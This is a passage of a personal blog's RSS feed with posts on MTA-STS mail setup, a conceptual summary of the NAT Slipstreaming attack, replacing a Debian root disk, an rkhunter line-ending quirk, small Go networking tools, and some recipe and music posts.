  3694.    <description><![CDATA[<p>Recently I added <a href="" title="SMTP MTA Strict-Transport-Security">MTA-STS</a> support to one of my domains, and it turns out that this was easier than expected.</p>
  3695. <p>MTA-STS is used to tell mail senders that your server supports TLS. And then you can define the policy for your server and tell them that they should only use TLS (resp. STARTTLS) when connecting to you and not fall back to unencrypted SMTP.</p>
  3696. <p>The way this works is with two components:</p>
  3697. <ul>
  3698. <li>a special <code>_mta-sts.&lt;;</code> TXT DNS entry indicating that your domain supports MTA-STS and the version number of your MTA-STS policy</li>
  3699. <li>a mta-sts.txt file served under a specific well-known URL <code>https://mta-sts.&lt;;/.well-known/mta-sts.txt</code> containing your MTA-STS policy (which mx hosts it is valid for, should it be run in enforcing or testing mode, max-age etc.)</li>
  3700. </ul>
  3701. <p>The idea is that a mail sender checks your MTA-STS policy through protected channels (DNSSEC, HTTPS) and then never sends mails to you in plaintext (similar approach as <a href="" title="HTTP Strict Transport Security">HSTS</a> for HTTP but this time between mail servers).</p>
  3703. <p>To setup the MTA-STS configuration, I followed this <a href="" title="Enable MTA-STS in 5 Minutes with NGINX">Enable MTA-STS in 5 Minutes with NGINX</a> guide from <a href="" title="Home - Yoonsik Park">Yoonsik Park</a>.</p>
  3704. <p>Then to check my configuration I used this <a href="" title="MTA-STS validator">MTA-STS validator</a> (which is an opensource project available on <a href="" title="GitHub - aykevl/mta-sts: Online tool for MTA-STS checking:">GitHub</a>), the classic <a href="" title="//email/testTo:"> //email/testTo: tool</a> (MTA-STS checking needs to be explicitly enabled under 'More Options') and the free testing service provided by <a href="" title="Harenize: Comprehensive web site configuration test">Hardenize</a>.</p>
  3705. ]]></description>
  3706.    <content:encoded><![CDATA[<p>Recently I added <a href="" title="SMTP MTA Strict-Transport-Security">MTA-STS</a> support to one of my domains, and it turns out that this was easier than expected.</p>
  3707. <p>MTA-STS is used to tell mail senders that your server supports TLS. And then you can define the policy for your server and tell them that they should only use TLS (resp. STARTTLS) when connecting to you and not fall back to unencrypted SMTP.</p>
  3708. <p>The way this works is with two components:</p>
  3709. <ul>
  3710. <li>a special <code>_mta-sts.&lt;;</code> TXT DNS entry indicating that your domain supports MTA-STS and the version number of your MTA-STS policy</li>
  3711. <li>a mta-sts.txt file served under a specific well-known URL <code>https://mta-sts.&lt;;/.well-known/mta-sts.txt</code> containing your MTA-STS policy (which mx hosts it is valid for, should it be run in enforcing or testing mode, max-age etc.)</li>
  3712. </ul>
  3713. <p>The idea is that a mail sender checks your MTA-STS policy through protected channels (DNSSEC, HTTPS) and then never sends mails to you in plaintext (similar approach as <a href="" title="HTTP Strict Transport Security">HSTS</a> for HTTP but this time between mail servers).</p>
  3715. <p>To setup the MTA-STS configuration, I followed this <a href="" title="Enable MTA-STS in 5 Minutes with NGINX">Enable MTA-STS in 5 Minutes with NGINX</a> guide from <a href="" title="Home - Yoonsik Park">Yoonsik Park</a>.</p>
  3716. <p>Then to check my configuration I used this <a href="" title="MTA-STS validator">MTA-STS validator</a> (which is an opensource project available on <a href="" title="GitHub - aykevl/mta-sts: Online tool for MTA-STS checking:">GitHub</a>), the classic <a href="" title="//email/testTo:"> //email/testTo: tool</a> (MTA-STS checking needs to be explicitly enabled under 'More Options') and the free testing service provided by <a href="" title="Harenize: Comprehensive web site configuration test">Hardenize</a>.</p>
  3717. ]]></content:encoded>
  3718.  </item>
  3720.  <item>
  3721.    <title>15 years of o5</title>
  3722.    <link></link>
  3723.    <guid isPermaLink="true"></guid>
  3724.    <dc:creator>Andreas Jaggi</dc:creator>
  3725.    <creativeCommons:license></creativeCommons:license>
  3726.    <pubDate>Sun, 01 Nov 2020 19:03:00 +0100</pubDate>
  3727.    <category domain="">Webdesign</category>
  3728.    <description><![CDATA[<p><a href="" title="x-log - CSS Reboot Fall 2005">15 years ago</a> this weblog received the current o5 design (or theme as it would be called nowadays).<br>
  3729. During this time the design has aged quite well and also survived <a href="" title="x-log - Online Again">the move</a> of the backend from a self-written PHP blog-engine to Jekyll.</p>
  3730. <p>Although it still works surprisingly well and presents the content nicely every day, there are some parts where better usage of contemporary technologies would be desirable.<br>It has no mobile version nor a responsive layout as the design was created before the now omnipresent smartphones were invented. Similar is the font-size hardcoded and not very adequate for todays retina displays. And yes, it uses the XHTML 1.0 strict standard with all its quirks and CSS tricks from 2002 (which luckily are still supported in current browsers).</p>
  3731. <p>Overall I'm quite happy that the o5 design has turned out to be so timeless and that I did not have to come up with a new one every other year (btw: I don't remember where the o5 name came from, likely the 5 is a reference to 2005 when it was created).</p>
  3732. <p>With the current Corona situation forcing me to spend more time at home again, I have the feeling that some things might change around the weblog (not quite sure what or when exactly, first I need to re-learn how websites are built in 2020 :-).</p>
  3733. ]]></description>
  3734.    <content:encoded><![CDATA[<p><a href="" title="x-log - CSS Reboot Fall 2005">15 years ago</a> this weblog received the current o5 design (or theme as it would be called nowadays).<br>
  3735. During this time the design has aged quite well and also survived <a href="" title="x-log - Online Again">the move</a> of the backend from a self-written PHP blog-engine to Jekyll.</p>
  3736. <p>Although it still works surprisingly well and presents the content nicely every day, there are some parts where better usage of contemporary technologies would be desirable.<br>It has no mobile version nor a responsive layout as the design was created before the now omnipresent smartphones were invented. Similar is the font-size hardcoded and not very adequate for todays retina displays. And yes, it uses the XHTML 1.0 strict standard with all its quirks and CSS tricks from 2002 (which luckily are still supported in current browsers).</p>
  3737. <p>Overall I'm quite happy that the o5 design has turned out to be so timeless and that I did not have to come up with a new one every other year (btw: I don't remember where the o5 name came from, likely the 5 is a reference to 2005 when it was created).</p>
  3738. <p>With the current Corona situation forcing me to spend more time at home again, I have the feeling that some things might change around the weblog (not quite sure what or when exactly, first I need to re-learn how websites are built in 2020 :-).</p>
  3739. ]]></content:encoded>
  3740.  </item>
  3742.  <item>
  3743.    <title>NAT Slipstreaming (NAT traversal part 2)</title>
  3744.    <link></link>
  3745.    <guid isPermaLink="true"></guid>
  3746.    <dc:creator>Andreas Jaggi</dc:creator>
  3747.    <creativeCommons:license></creativeCommons:license>
  3748.    <pubDate>Sat, 31 Oct 2020 22:55:00 +0100</pubDate>
  3749.    <category domain="">Networking</category>
  3750.    <description><![CDATA[<p>Compared to the <a href="" title="x-log - How NAT traversal works">previous post</a> where intentional NAT traversal was discussed, here now comes an article about 'unintentional' (malicious) NAT traversal.</p>
  3751. <p><a href="" title="Samy Kamar">Samy Kamar</a> describes in his <a href="" title="Samy Kamar - NAT Slipstreaming">NAT Slipstreaming article</a> how a combination of TCP packet segmentation and smuggling SIP requests in HTTP, can be used to trick the NAT <abbr title="Application Layer Gateway">ALG</abbr> of your router into opening arbitrary ports for inbound connections from the Internet to your computer.</p>
  3752. <p>The article analyses in detail the SIP ALG of the Linux netfilter stack in it's default configuration, but likely similar attacks could also be possible with ALGs of other protocols and vendors.</p>
  3753. <p>Important to note: the Linux SIP ALG module has two parameters (sip_direct_media and sip_direct_signalling), which restrict the IP address for which additional ports are opened to the one sending the original SIP packet. By default they are set to 1, but if any of these is set to 0 in a router's configuration, the described NAT Slipstreaming attack will not only allow to make inbound connections to your computer, but also to any other device in the local network!</p>
  3754. ]]></description>
  3755.    <content:encoded><![CDATA[<p>Compared to the <a href="" title="x-log - How NAT traversal works">previous post</a> where intentional NAT traversal was discussed, here now comes an article about 'unintentional' (malicious) NAT traversal.</p>
  3756. <p><a href="" title="Samy Kamar">Samy Kamar</a> describes in his <a href="" title="Samy Kamar - NAT Slipstreaming">NAT Slipstreaming article</a> how a combination of TCP packet segmentation and smuggling SIP requests in HTTP, can be used to trick the NAT <abbr title="Application Layer Gateway">ALG</abbr> of your router into opening arbitrary ports for inbound connections from the Internet to your computer.</p>
  3757. <p>The article analyses in detail the SIP ALG of the Linux netfilter stack in it's default configuration, but likely similar attacks could also be possible with ALGs of other protocols and vendors.</p>
  3758. <p>Important to note: the Linux SIP ALG module has two parameters (sip_direct_media and sip_direct_signalling), which restrict the IP address for which additional ports are opened to the one sending the original SIP packet. By default they are set to 1, but if any of these is set to 0 in a router's configuration, the described NAT Slipstreaming attack will not only allow to make inbound connections to your computer, but also to any other device in the local network!</p>
  3759. ]]></content:encoded>
  3760.  </item>
  3762.  <item>
  3763.    <title>How NAT traversal works</title>
  3764.    <link></link>
  3765.    <guid isPermaLink="true"></guid>
  3766.    <dc:creator>Andreas Jaggi</dc:creator>
  3767.    <creativeCommons:license></creativeCommons:license>
  3768.    <pubDate>Sun, 23 Aug 2020 21:08:00 +0200</pubDate>
  3769.    <category domain="">Networking</category>
  3770.    <description><![CDATA[<p><a href="" title="How NAT traversal works - Tailscale Blog">How NAT traversal works</a> &ndash; is a very well written and detailed article from <a href="" title="Dave Anderson (@dave_universetf)">Dave Anderson</a> explaining the different NAT scenarios and the tricks that can be used to establish a peer-to-peer UDP connection between machines sitting behind them.</p>
  3771. ]]></description>
  3772.    <content:encoded><![CDATA[<p><a href="" title="How NAT traversal works - Tailscale Blog">How NAT traversal works</a> &ndash; is a very well written and detailed article from <a href="" title="Dave Anderson (@dave_universetf)">Dave Anderson</a> explaining the different NAT scenarios and the tricks that can be used to establish a peer-to-peer UDP connection between machines sitting behind them.</p>
  3773. ]]></content:encoded>
  3774.  </item>
  3776.  <item>
  3777.    <title>Replace the root disk</title>
  3778.    <link></link>
  3779.    <guid isPermaLink="true"></guid>
  3780.    <dc:creator>Andreas Jaggi</dc:creator>
  3781.    <creativeCommons:license></creativeCommons:license>
  3782.    <pubDate>Sun, 07 Jun 2020 10:58:00 +0200</pubDate>
  3783.    <category domain="">Linux</category>
  3784.    <description><![CDATA[<p>Recently the disk holding the root (<kbd>/</kbd>) filesystem on one of my linux systems started to report increased <a href="" title="S.M.A.R.T - Wikipedia">SMART</a> raw read error rates, seek error rates and ECC recovered hardware errors.</p>
  3785. <p>As these are early indications of a failing disk, it became time to replace the disk.</p>
  3786. <p>Normally replacing a disk comes down to plugging in the new one, coyping over the data, umount the old disk, mount the new one in place, unplug the old disk.<br>But when it is the disk with the root filesystem a couple extra steps are needed.</p>
  3787. <p>The steps below worked for my Debian system without problems (even used the opportunity to upgrade to an SSD :-)</p>
  3788. <p>(source is <a href="" title="How do I replace Root Drive on Debian?">this thread</a> on StackExchange)</p>
  3790. <blockquote>
  3791. <p>The following makes some assumptions:</p>
  3792. <ul>
  3793. <li>All commands ran as root when possible</li>
  3794. <li>You are on a physical console to the host (need to type in grub commands to boot up the new disk!)</li>
  3795. <li>You want an ext4 files system</li>
  3796. <li>You are loosely familiar on a basic level with all commands run</li>
  3797. <li>You are NOT booting from a RAID device</li>
  3798. </ul>
  3799. <p>So here we go.</p>
  3800. <ol>
  3801. <li>Physically install new disk into computer and connect to available port leaving old disk in existing position.</li>
  3802. <li>Boot computer into old OS.</li>
  3803. <li>Prepare and mount new disk; first identify new disk<br>
  3804. <kbd>fdisk -l</kbd>
  3805. </li>
  3806. <li>Partition new disk<br>
  3807. <kbd>fdisk /dev/(newdisk)</kbd><br>
  3808. Make partition primary partition with type "83" file system type.
  3809. </li>
  3810. <li>Create filesystem<br>
  3811. <kbd>mkfs.ext4 /dev/(newpartition)</kbd>
  3812. </li>
  3813. <li>Mount new filesystem<br>
  3814. <kbd>mkdir /mnt/(newpartitionmountpoint)</kbd><br>
  3815. <kbd>mount /dev/(newpartition) /mnt/(newpartitionmountpoint)</kbd>
  3816. </li>
  3817. <li>Copy disk:<br>
  3818. <kbd>/sbin/init 1</kbd> (drop to single user mode)<br>
  3819. <kbd>rsync -avxHAX / /mnt/(newpartitionmountpoint)</kbd>
  3820. </li>
  3821. <li>Update FSTAB on newdisk<br>
  3822. <kbd>blkid</kbd> (note UUID of new partition)<br>
  3823. <kbd>vi /mnt/(newpartitionmountpoint)/etc/fstab</kbd><br>
  3824. Replace existing UUID of / in FSTAB to new disk UUID
  3825. </li>
  3826. <li>Configure grub and install to new disk boot loader:<br>
  3827. <kbd>grub-mkconfig</kbd><br>
  3828. <kbd>update-grub</kbd><br>
  3829. <kbd>grub-install /dev/(newdisk)</kbd>
  3830. </li>
  3831. <li>Copy grub.cfg from old disk to new<br>
  3832. <kbd>cp -ax /boot/grub/grub.cfg /mnt/(newpartitionmountpoint)/boot/grub/grub.cfg</kbd>
  3833. </li>
  3834. <li>Open grub.cfg on new disk and replace all UUIDs with new disk<br>
  3835. <kbd>vi /mnt/(newpartitionmountpoint)/boot/grub/grub.cfg</kbd><br>
  3836. Replace all old UUIDs with the UUID of the new disk
  3837. </li>
  3838. <li>Shut down computer<br>
  3839. <kbd>shutdown</kbd>
  3840. </li>
  3841. <li>Physically move the new drive to the 1st drive location and remove old drive</li>
  3842. <li>Start computer and grub should present:<br>
  3843. <pre>error: no such device: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx
  3845. GRUB rescue&gt;</pre>
  3846. </li>
  3847. <li>Manually boot new OS from grub; first identify the drive and partition of the boot files<br>
  3848. <kbd>ls</kbd> [to identify your drive and partition options]<br>
  3849. <kbd>ls (hdx,p)/</kbd> [to identify which partition has the /boot folder]
  3850. </li>
  3851. <li>Then, you can load the boot menu manually from the drive and partition you found above. Typically this would be (hd0,msdos1).<br>
  3852. <kbd>set prefix="(hdx,p)/boot/grub"</kbd><br>
  3853. <kbd>set root="(hdx,p)"</kbd><br>
  3854. <kbd>insmod normal</kbd><br>
  3855. <kbd>normal</kbd>
  3856. </li>
  3857. <li>Login to OS on new drive</li>
  3858. <li>Configure grub again<br>
  3859. <kbd>fdisk -l</kbd> (note dev of newdisk)<br>
  3860. <kbd>grub-mkconfig</kbd><br>
  3861. <kbd>update-grub</kbd><br>
  3862. <kbd>grub-install /dev/newdisk</kbd>
  3863. </li>
  3864. </ol>
  3865. <p>And that should be it!</p>
  3866. </blockquote>
  3867. ]]></description>
  3868.    <content:encoded><![CDATA[<p>Recently the disk holding the root (<kbd>/</kbd>) filesystem on one of my linux systems started to report increased <a href="" title="S.M.A.R.T - Wikipedia">SMART</a> raw read error rates, seek error rates and ECC recovered hardware errors.</p>
  3869. <p>As these are early indications of a failing disk, it became time to replace the disk.</p>
  3870. <p>Normally replacing a disk comes down to plugging in the new one, coyping over the data, umount the old disk, mount the new one in place, unplug the old disk.<br>But when it is the disk with the root filesystem a couple extra steps are needed.</p>
  3871. <p>The steps below worked for my Debian system without problems (even used the opportunity to upgrade to an SSD :-)</p>
  3872. <p>(source is <a href="" title="How do I replace Root Drive on Debian?">this thread</a> on StackExchange)</p>
  3874. <blockquote>
  3875. <p>The following makes some assumptions:</p>
  3876. <ul>
  3877. <li>All commands ran as root when possible</li>
  3878. <li>You are on a physical console to the host (need to type in grub commands to boot up the new disk!)</li>
  3879. <li>You want an ext4 files system</li>
  3880. <li>You are loosely familiar on a basic level with all commands run</li>
  3881. <li>You are NOT booting from a RAID device</li>
  3882. </ul>
  3883. <p>So here we go.</p>
  3884. <ol>
  3885. <li>Physically install new disk into computer and connect to available port leaving old disk in existing position.</li>
  3886. <li>Boot computer into old OS.</li>
  3887. <li>Prepare and mount new disk; first identify new disk<br>
  3888. <kbd>fdisk -l</kbd>
  3889. </li>
  3890. <li>Partition new disk<br>
  3891. <kbd>fdisk /dev/(newdisk)</kbd><br>
  3892. Make partition primary partition with type "83" file system type.
  3893. </li>
  3894. <li>Create filesystem<br>
  3895. <kbd>mkfs.ext4 /dev/(newpartition)</kbd>
  3896. </li>
  3897. <li>Mount new filesystem<br>
  3898. <kbd>mkdir /mnt/(newpartitionmountpoint)</kbd><br>
  3899. <kbd>mount /dev/(newpartition) /mnt/(newpartitionmountpoint)</kbd>
  3900. </li>
  3901. <li>Copy disk:<br>
  3902. <kbd>/sbin/init 1</kbd> (drop to single user mode)<br>
  3903. <kbd>rsync -avxHAX / /mnt/(newpartitionmountpoint)</kbd>
  3904. </li>
  3905. <li>Update FSTAB on newdisk<br>
  3906. <kbd>blkid</kbd> (note UUID of new partition)<br>
  3907. <kbd>vi /mnt/(newpartitionmountpoint)/etc/fstab</kbd><br>
  3908. Replace existing UUID of / in FSTAB to new disk UUID
  3909. </li>
  3910. <li>Configure grub and install to new disk boot loader:<br>
  3911. <kbd>grub-mkconfig</kbd><br>
  3912. <kbd>update-grub</kbd><br>
  3913. <kbd>grub-install /dev/(newdisk)</kbd>
  3914. </li>
  3915. <li>Copy grub.cfg from old disk to new<br>
  3916. <kbd>cp -ax /boot/grub/grub.cfg /mnt/(newpartitionmountpoint)/boot/grub/grub.cfg</kbd>
  3917. </li>
  3918. <li>Open grub.cfg on new disk and replace all UUIDs with new disk<br>
  3919. <kbd>vi /mnt/(newpartitionmountpoint)/boot/grub/grub.cfg</kbd><br>
  3920. Replace all old UUIDs with the UUID of the new disk
  3921. </li>
  3922. <li>Shut down computer<br>
  3923. <kbd>shutdown</kbd>
  3924. </li>
  3925. <li>Physically move the new drive to the 1st drive location and remove old drive</li>
  3926. <li>Start computer and grub should present:<br>
  3927. <pre>error: no such device: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx
  3929. GRUB rescue&gt;</pre>
  3930. </li>
  3931. <li>Manually boot new OS from grub; first identify the drive and partition of the boot files<br>
  3932. <kbd>ls</kbd> [to identify your drive and partition options]<br>
  3933. <kbd>ls (hdx,p)/</kbd> [to identify which partition has the /boot folder]
  3934. </li>
  3935. <li>Then, you can load the boot menu manually from the drive and partition you found above. Typically this would be (hd0,msdos1).<br>
  3936. <kbd>set prefix="(hdx,p)/boot/grub"</kbd><br>
  3937. <kbd>set root="(hdx,p)"</kbd><br>
  3938. <kbd>insmod normal</kbd><br>
  3939. <kbd>normal</kbd>
  3940. </li>
  3941. <li>Login to OS on new drive</li>
  3942. <li>Configure grub again<br>
  3943. <kbd>fdisk -l</kbd> (note dev of newdisk)<br>
  3944. <kbd>grub-mkconfig</kbd><br>
  3945. <kbd>update-grub</kbd><br>
  3946. <kbd>grub-install /dev/newdisk</kbd>
  3947. </li>
  3948. </ol>
  3949. <p>And that should be it!</p>
  3950. </blockquote>
  3951. ]]></content:encoded>
  3952.  </item>
  3954.  <item>
  3955.    <title>rkhunter CRLF confusion</title>
  3956.    <link></link>
  3957.    <guid isPermaLink="true"></guid>
  3958.    <dc:creator>Andreas Jaggi</dc:creator>
  3959.    <creativeCommons:license></creativeCommons:license>
  3960.    <pubDate>Sun, 24 May 2020 11:22:00 +0200</pubDate>
  3961.    <category domain="">Linux</category>
  3962.    <description><![CDATA[<p>On my Linux hosts I'm running <a href="" title="The Rootkit Hunter project">rkhunter</a>. On a newly configured host it lately reported the following warning:</p>
  3963. <pre>Warning: The SSH and rkhunter configuration options should be the same:
  3964.        SSH configuration option 'PermitRootLogin': no
  3965. Rkhunter configuration option 'ALLOW_SSH_ROOT_USER': no</pre>
  3966. <p>On first sight the warning does not seem to make much sense, as both configuration options seem to be set to the same value (<code>no</code>).<br>
  3967. But digging further reveals that they are stored slightly different:</p>
  3968. <pre># file /etc/rkhunter.conf
  3969. /etc/rkhunter.conf: ASCII text
  3970. # file /etc/ssh/sshd_config
  3971. /etc/ssh/sshd_config: ASCII text, with CRLF line terminators</pre>
  3972. <p>Turns out that rkhunter is also checking the line terminators as part of the configuration values, and warns because they are different.</p>
  3973. <p>Knowing this, the fix is simple: run <a href="" title="dos2unix">dos2unix</a> on the CRLF file</p>
  3974. ]]></description>
  3975.    <content:encoded><![CDATA[<p>On my Linux hosts I'm running <a href="" title="The Rootkit Hunter project">rkhunter</a>. On a newly configured host it lately reported the following warning:</p>
  3976. <pre>Warning: The SSH and rkhunter configuration options should be the same:
  3977.        SSH configuration option 'PermitRootLogin': no
  3978. Rkhunter configuration option 'ALLOW_SSH_ROOT_USER': no</pre>
  3979. <p>On first sight the warning does not seem to make much sense, as both configuration options seem to be set to the same value (<code>no</code>).<br>
  3980. But digging further reveals that they are stored slightly different:</p>
  3981. <pre># file /etc/rkhunter.conf
  3982. /etc/rkhunter.conf: ASCII text
  3983. # file /etc/ssh/sshd_config
  3984. /etc/ssh/sshd_config: ASCII text, with CRLF line terminators</pre>
  3985. <p>Turns out that rkhunter is also checking the line terminators as part of the configuration values, and warns because they are different.</p>
  3986. <p>Knowing this, the fix is simple: run <a href="" title="dos2unix">dos2unix</a> on the CRLF file</p>
  3987. ]]></content:encoded>
  3988.  </item>
  3990.  <item>
  3991.    <title>ipaddr CLI tool</title>
  3992.    <link></link>
  3993.    <guid isPermaLink="true"></guid>
  3994.    <dc:creator>Andreas Jaggi</dc:creator>
  3995.    <creativeCommons:license></creativeCommons:license>
  3996.    <pubDate>Thu, 21 May 2020 19:38:00 +0200</pubDate>
  3997.    <category domain="">Networking</category>
  3998.    <description><![CDATA[<p>While doing some maintenance on my server, I got tired of searching through the output of <code>ip addr show</code> to find the IP addresses configured on the interfaces.<br>
  3999. Thus I wrote a simple CLI tool to display the information I needed in a concise and human friendly form: <a href="" title="ipaddr - human friendly list of IP addresses and network interfaces">ipaddr</a></p>
  4000. <pre>$ ipaddr
  4001. lo
  4002. ens5
  4003. tun24008
  4004. tun71991639
  4005. tun26724
  4006. tun3883710</pre>
  4007. <p>A nice side-effect of writing this in <a href="" title="The Go Programming Language">Go</a> is that it works out-of-the-box also on non-Linux systems :-)</p>
  4008. ]]></description>
  4009.    <content:encoded><![CDATA[<p>While doing some maintenance on my server, I got tired of searching through the output of <code>ip addr show</code> to find the IP addresses configured on the interfaces.<br>
  4010. Thus I wrote a simple CLI tool to display the information I needed in a concise and human friendly form: <a href="" title="ipaddr - human friendly list of IP addresses and network interfaces">ipaddr</a></p>
  4011. <pre>$ ipaddr
  4012. lo
  4013. ens5
  4014. tun24008
  4015. tun71991639
  4016. tun26724
  4017. tun3883710</pre>
  4018. <p>A nice side-effect of writing this in <a href="" title="The Go Programming Language">Go</a> is that it works out-of-the-box also on non-Linux systems :-)</p>
  4019. ]]></content:encoded>
  4020.  </item>
  4022.  <item>
  4023.    <title>Poor man's reboot notification</title>
  4024.    <link></link>
  4025.    <guid isPermaLink="true"></guid>
  4026.    <dc:creator>Andreas Jaggi</dc:creator>
  4027.    <creativeCommons:license></creativeCommons:license>
  4028.    <pubDate>Sat, 18 Apr 2020 15:03:00 +0200</pubDate>
  4029.    <category domain="">Linux</category>
  4030.    <description><![CDATA[<p>Sometimes you need to be notified about reboots of a machine without having the luxury of a proper monitoring system.</p>
  4031. <p>The following crontab entry triggers an e-mail when the host has been rebooted in the last 5 minutes.</p>
  4032. <pre>*/5 * * * * [ $(sed -e 's/\..*//' /proc/uptime) -lt 540 ] &amp;&amp; echo "Host has been rebooted! Uptime: $(uptime)"</pre>
  4033. ]]></description>
  4034.    <content:encoded><![CDATA[<p>Sometimes you need to be notified about reboots of a machine without having the luxury of a proper monitoring system.</p>
  4035. <p>The following crontab entry triggers an e-mail when the host has been rebooted in the last 5 minutes.</p>
  4036. <pre>*/5 * * * * [ $(sed -e 's/\..*//' /proc/uptime) -lt 540 ] &amp;&amp; echo "Host has been rebooted! Uptime: $(uptime)"</pre>
  4037. ]]></content:encoded>
  4038.  </item>
  4040.  <item>
  4041.    <title>Cottage cheese Avocado Crostini</title>
  4042.    <link></link>
  4043.    <guid isPermaLink="true"></guid>
  4044.    <dc:creator>Andreas Jaggi</dc:creator>
  4045.    <creativeCommons:license></creativeCommons:license>
  4046.    <pubDate>Sun, 12 Apr 2020 19:16:00 +0200</pubDate>
  4047.    <category domain="">Food</category>
  4048.    <description><![CDATA[<p>Inspired by <a href="" title="Avocado-Ricotta-Crostini - Rezepte |">this recipe</a>, I made some yummy Crostini using Cottage cheese (instead of Ricotta cheese) and Avocado with some drops of Aceto balsamico.</p>
  4049. <p><img src="" alt="Cottage cheese Avocado Crostini" width="439" height="329"></p>
  4050. ]]></description>
  4051.    <content:encoded><![CDATA[<p>Inspired by <a href="" title="Avocado-Ricotta-Crostini - Rezepte |">this recipe</a>, I made some yummy Crostini using Cottage cheese (instead of Ricotta cheese) and Avocado with some drops of Aceto balsamico.</p>
  4052. <p><img src="" alt="Cottage cheese Avocado Crostini" width="439" height="329"></p>
  4053. ]]></content:encoded>
  4054.  </item>
  4056.  <item>
  4057.    <title>Ein Lied für Jetzt</title>
  4058.    <link></link>
  4059.    <guid isPermaLink="true"></guid>
  4060.    <dc:creator>Andreas Jaggi</dc:creator>
  4061.    <creativeCommons:license></creativeCommons:license>
  4062.    <pubDate>Sat, 28 Mar 2020 08:53:00 +0100</pubDate>
  4063.    <category domain="">Music</category>
  4064.    <description><![CDATA[<p><a href="" title="die ärzte - Ein Lied für Jetzt - YouTube">die ärzte - Ein Lied für Jetzt</a></p>
  4065. ]]></description>
  4066.    <content:encoded><![CDATA[<p><a href="" title="die ärzte - Ein Lied für Jetzt - YouTube">die ärzte - Ein Lied für Jetzt</a></p>
  4067. ]]></content:encoded>
  4068.  </item>
  4070.  <item>
  4071.    <title>ip_compact and ip_diff</title>
  4072.    <link></link>
  4073.    <guid isPermaLink="true"></guid>
  4074.    <dc:creator>Andreas Jaggi</dc:creator>
  4075.    <creativeCommons:license></creativeCommons:license>
  4076.    <pubDate>Sat, 21 Mar 2020 15:18:00 +0100</pubDate>
  4077.    <category domain="">Networking</category>
  4078.    <description><![CDATA[<p>Somehow I always end up working with lists of IP networks and needing to minimize and compare them.</p>
  4079. <p>Some of my Perl scripts for this might still be hidden in a corporate source repository, and somewhere in the backups of my old Linux laptop should be even earlier attempts in Bash.</p>
  4080. <p>Both of them are not very useful to me where they are, thus I've written yet another version.<br>This time in Go using the <a href="" title="package ipaddr">ipaddr</a> package.</p>
  4081. <p>Say hello to <a href="" title="ip_compact - Compact a list of IP prefixes">ip_compact</a> and <a href="" title="ip_diff - Compare two lists of IP prefixes">ip_diff</a> :-)</p>
  4082. ]]></description>
  4083.    <content:encoded><![CDATA[<p>Somehow I always end up working with lists of IP networks and needing to minimize and compare them.</p>
  4084. <p>Some of my Perl scripts for this might still be hidden in a corporate source repository, and somewhere in the backups of my old Linux laptop should be even earlier attempts in Bash.</p>
  4085. <p>Both of them are not very useful to me where they are, thus I've written yet another version.<br>This time in Go using the <a href="" title="package ipaddr">ipaddr</a> package.</p>
  4086. <p>Say hello to <a href="" title="ip_compact - Compact a list of IP prefixes">ip_compact</a> and <a href="" title="ip_diff - Compare two lists of IP prefixes">ip_diff</a> :-)</p>
  4087. ]]></content:encoded>
  4088.  </item>
  4090.  <item>
  4091.    <title>#StayTheFuckHome</title>
  4092.    <link></link>
  4093.    <guid isPermaLink="true"></guid>
  4094.    <dc:creator>Andreas Jaggi</dc:creator>
  4095.    <creativeCommons:license></creativeCommons:license>
  4096.    <pubDate>Tue, 17 Mar 2020 19:33:00 +0100</pubDate>
  4097.    <category domain="">Music</category>
  4098.    <description><![CDATA[<p><a href="" title="Bitch Queens - #StayTheFuckHome - YouTube">Bitch Queens - #StayTheFuckHome</a></p>
  4099. <p><a href="" title="Stay The Fuck Home!">Stay The Fuck Home!</a></p>
  4100. ]]></description>
  4101.    <content:encoded><![CDATA[<p><a href="" title="Bitch Queens - #StayTheFuckHome - YouTube">Bitch Queens - #StayTheFuckHome</a></p>
  4102. <p><a href="" title="Stay The Fuck Home!">Stay The Fuck Home!</a></p>
  4103. ]]></content:encoded>
  4104.  </item>
  4106.  <item>
  4107.    <title>This Page is Designed to Last</title>
  4108.    <link></link>
  4109.    <guid isPermaLink="true"></guid>
  4110.    <dc:creator>Andreas Jaggi</dc:creator>
  4111.    <creativeCommons:license></creativeCommons:license>
  4112.    <pubDate>Fri, 20 Dec 2019 09:56:00 +0100</pubDate>
  4113.    <category domain="">Misc</category>
  4114.    <description><![CDATA[<p><a href="" title="This Page is Designed to Last: A Manifesto for Preserving Content on the Web">This Page is Designed to Last</a> &mdash; a manifesto from Jeff Huang for preserving content on the web, where he advocates to keep content on the web available and pledges to keep his site available for the next 10 years.</p>
  4115. <p>Having my content in this weblog online since 2002, I can very much relate to this initiative and additionally would like to point to the efforts of <a href=""></a> (aka. The Internet Archive).<br>The wayback machine of allows to see old versions of websites, even when the website itself is no longer available.</p>
  4116. <p>For me personally this became critically useful when the database of my weblog vanished with no current backup and I then used the archived versions from to <a href="" title="Online Again">restore the missing content</a>.</p>
  4117. <p>Thus I would like to encourage everyone to support the efforts of with a <a href="" title="Donate to the Internet Archive!">donation</a>.</p>
  4118. ]]></description>
  4119.    <content:encoded><![CDATA[<p><a href="" title="This Page is Designed to Last: A Manifesto for Preserving Content on the Web">This Page is Designed to Last</a> &mdash; a manifesto from Jeff Huang for preserving content on the web, where he advocates to keep content on the web available and pledges to keep his site available for the next 10 years.</p>
  4120. <p>Having my content in this weblog online since 2002, I can very much relate to this initiative and additionally would like to point to the efforts of <a href=""></a> (aka. The Internet Archive).<br>The wayback machine of allows to see old versions of websites, even when the website itself is no longer available.</p>
  4121. <p>For me personally this became critically useful when the database of my weblog vanished with no current backup and I then used the archived versions from to <a href="" title="Online Again">restore the missing content</a>.</p>
  4122. <p>Thus I would like to encourage everyone to support the efforts of with a <a href="" title="Donate to the Internet Archive!">donation</a>.</p>
  4123. ]]></content:encoded>
  4124.  </item>
  4126.  <item>
  4127.    <title>The Comet Is Coming</title>
  4128.    <link></link>
  4129.    <guid isPermaLink="true"></guid>
  4130.    <dc:creator>Andreas Jaggi</dc:creator>
  4131.    <creativeCommons:license></creativeCommons:license>
  4132.    <pubDate>Sat, 02 Nov 2019 11:04:00 +0100</pubDate>
  4133.    <category domain="">Music</category>
  4134.    <description><![CDATA[<p><a href="" title="The Comet Is Coming - Summon The Fire - YouTube">The Comet Is Coming - Summon The Fire</a></p>
  4135. <p><a href="" title="The Comet Is Coming">The Comet Is Coming</a> is a 21st century style Jazz band.<br>
  4136. Discovered at the <a href="" title="Zurich Jazznojazz Festival 2019">Jazznojazz</a> festival :-)</p>
  4137. ]]></description>
